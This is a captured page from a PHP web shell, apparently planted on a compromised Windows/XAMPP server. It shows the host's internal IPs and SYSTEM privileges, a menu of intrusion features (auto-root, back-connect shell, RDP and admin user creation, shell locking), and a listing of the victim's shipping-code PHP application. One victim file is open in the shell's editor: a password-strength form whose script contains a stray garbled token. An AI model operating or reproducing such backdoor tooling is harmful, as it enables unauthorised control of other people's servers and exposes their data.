Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
kod /
[ HOME SHELL ]
Name
Size
Permission
Action
!test.php
2.49
KB
-rw-rw-rw-
audit_trail.php
17.26
KB
-rw-rw-rw-
audit_trail_240205.php
16.15
KB
-rw-rw-rw-
blank_page.php
10.78
KB
-rw-rw-rw-
email_test.php
21.54
KB
-rw-rw-rw-
kodCP.php
10.09
KB
-rw-rw-rw-
kodCTU.php
10.04
KB
-rw-rw-rw-
kodDG.php
11.48
KB
-rw-rw-rw-
kodDimension.php
10.07
KB
-rw-rw-rw-
kodDoctype.php
10.19
KB
-rw-rw-rw-
kodJenisKapal.php
10.09
KB
-rw-rw-rw-
kodJenisOps.php
10.09
KB
-rw-rw-rw-
kodJenisSyarikat.php
10.13
KB
-rw-rw-rw-
kodKapal.php
40.1
KB
-rw-rw-rw-
kodKapal_230312.php
38.32
KB
-rw-rw-rw-
kodKapal_a.php
29.77
KB
-rw-rw-rw-
kodKapal_a_230312.php
29.46
KB
-rw-rw-rw-
kodMF.php
11.99
KB
-rw-rw-rw-
kodNegara.php
11.29
KB
-rw-rw-rw-
kodPacking.php
10.09
KB
-rw-rw-rw-
kodPort.php
16.28
KB
-rw-rw-rw-
kodPortBAK.php
15.7
KB
-rw-rw-rw-
kodPort_a.php
11.6
KB
-rw-rw-rw-
kodSyarikat.php
17.4
KB
-rw-rw-rw-
kodSyarikat_a.php
13.09
KB
-rw-rw-rw-
kodWeight.php
10.05
KB
-rw-rw-rw-
menu_list.php
19.24
KB
-rw-rw-rw-
new_blank.php
1.43
KB
-rw-rw-rw-
userList.php
14.46
KB
-rw-rw-rw-
userListxx.php
18.53
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : !test.php
<form id="signupForm" name="signupForm" method="POST" action="http://localhost/tajerlee/user/insertUSerRegistration" autocomplete='off'> <table border="1" bordercolor="#f1f7fc" width="100%"> <tr> <td> Choose a password <span class="mandatoryStar">*</span> <span class="small">8 or more characters</span> </td> <td> <input type="password" onkeyup="passwordStrength(this.value)" class="form-control" maxlength="30" minlength="8" id="password" name="password" placeholder="Enter password"> </td> </tr> <tr> <td> Confirm password <span class="mandatoryStar">*</span> </td> <td> <input type="password" class="form-control" maxlength="30" minlength="8" id="confirm_password" name = 'confirm_password'placeholder="Confirm password" > </td> </tr> <tr> <td> Password strength <span class="mandatoryStar">*</span> <span class="small">We recommend you use a strong, unique password. <a href="#" data-toggle="modal" data-target="#myModal">Find out more.</a> </span> </td> <td> <p> <div id="passwordDescription">Password not entered</div> <div id="passwordStrength" class="strength0"></div> </p></td> </tr> </table> </form> <!-- script for showing the password strenth --> <script> function passwordStrength(password) { var desc = new Array(); desc[0] = "Very Weak"; desc[1] = "Weak"; desc[2] = "Better"; desc[3] = "Medium"; desc[4] = "Strong"; desc[5] = "Strongest"; var score = 0; //if password bigger than 6 give 1 point if (password.length > 6) score++; //if password has both lower and uppercase characters give 1 point if ( ( password.match(/[a-z]/) ) && ( password.match(/[A-Z]/) ) ) score++; //if password has at least one number give 1 point if (password.match(/\d+/)) score++;mob //if password has at least one special caracther give 1 point if ( password.match(/.[!,@,#,$,%,^,&,*,?,_,~,-,(,)]/) ) score++; //if password bigger than 12 give another 1 point if (password.length > 12) score++; document.getElementById("passwordDescription").innerHTML = desc[score]; document.getElementById("passwordStrength").className = "strength" + score; } </script> <!-- script for showing the password strenth -->
Close